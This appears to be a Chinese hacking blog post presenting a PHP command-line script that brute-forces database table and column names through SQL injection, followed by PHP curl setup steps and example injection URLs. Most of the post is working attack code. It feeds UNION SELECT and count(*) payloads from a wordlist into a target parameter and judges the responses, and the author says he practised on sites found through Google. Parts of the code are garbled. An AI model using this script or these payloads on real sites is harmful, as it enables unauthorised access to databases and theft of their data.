最近俺又迷恋上脚本了,嘿嘿~~~刚学完PHP然后又看了些PHP安全方面的文章,于是乎从google中找了几个站练习一下。 结果发现php猜表名和列名真的很费劲啊,nbsi这类的扫描工具有没有那种用字典或者暴力猜解表名和列名的功能,难不成还得自己一个一个猜啊?我很懒的:-) 突然想到自己不是刚刚学完PHP吗?为什么不学以致用呢?php不光是一个web脚本语言,它还是一个非常棒的命令行解释语言,用它写脚本好方便的哦。为了以后能够碰到这类问题省点劲俺就写了一个php脚本用来猜表和列名的。脚本写的很简单,内容如下: echo " Universal Database tables explode exploit V0.1
"; echo " Written by Mika[EST]
"; //$keyword="Warning"; $keyword="error"; switch($argc){ case 3: $u=" and (select count(*) from MIKA_NAME)>0"; $dic=$argv[2]; break; case 4: $u=" and 1=1 union select ".implode(,,range(1,$argv[2]))." from MIKA_NAME#"; $dic=$argv[3]; break; case 5: if($argv[2]!="-t") exit("arguments Error"); $u=" and (select count(MIKA_NAME) from $argv[3])>0#"; $dic=$argv[4]; break; case 6: if($argv[2]!="-t" || $argv[4] exit("arguments Error"); if($argv[4]>=2){ $u=" and 1=1 union select ".MIKA_NAME.,.implode(,,range(2,$argv[4]))." from $argv[3]#"; }else{ $u=" and 1=1 union select MIKA_NAME from $argv[3]#"; } $dic=$argv[5]; break; default: echo Usage:$argv[0] [OPTIONS] OPTIONS: number --->to indicate column number of a table during a union query
Attention:if you dont use [options] the program will use default mode to work.you can change it in the source code of this program. USAGE; die; }
$old=$argv[1]; file_exists($dic) or exit("dic file does not exist!
"); $words=file($dic); $curl=curl_init(); curl_setopt($curl,CURLOPT_HEADER,0); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080"); print "[+]Searching What you want...
"; foreach($words as $word){ //print $word; if(preg_match("/^s$/",$word)){ //print "blank"; continue; } $url=str_replace(MIKA_NAME,trim($word),$u); $url=$old.urlencode($url); //$url=$old.$url; curl_setopt($curl,CURLOPT_URL,$url); //print "source url is:".$url."
"; $content=curl_exec($curl); //$new=$content; //print $content; if(preg_match("/$keyword/i",$content)==0){ print "[*] FOUND:".trim($word); } else{print ".";} } ?> 俺先解释一下吧:程序里用到的模块是curl,它用来获取网页内容是非常方便的。我的这个php是for windows的,所以里面集成了很多的模块。但是curl默认是不启用的,你需要开启它哦。方法很简单,去网上下载php最新版本的绿色版(不需要安装的,方便携带),然后将压缩包内的php.ini-recommended复制到系统目录(win2k是winnt目录,xp等的是windows目录)并将其改名为php.ini,然后用记事本打开,找到如下一行: extension_dir = 把它的值设置成你自己的,比如把压缩包接压到了c:php里,那么你需要把它设置成: extension_dir = "c:phpext"
然后再继续找到下面这段: ; Windows Extensions ; Note that ODBC support is built in, so no dll is needed for it. ; Note that many DLL files are located in the extensions/ (PHP 4) ext/ (PHP 5) ; extension folders as well as the separate PECL DLL download (PHP 5). ; Be sure to appropriately set the extension_dir directive.
需要注意的就是,由于这个程序本来就是俺自己用的,所以程序没有考虑很多东西。程序是根据页面返回的内容进行判断的,所以呢,你要首先自己手工获取一下,比如你可以这样: http://www.aaa.com/bbb.asp?ccc=56 and (select count(*) from mika520)>0(access和mssql上) 或者 http://www.aaa.com/bbb.asp?ccc=56 and 1=1 union select 1,2,3,4,5,6 from mika520%23 (mysql上)
网友评论
文明上网理性发言,请遵守 新闻评论服务协议
我要评论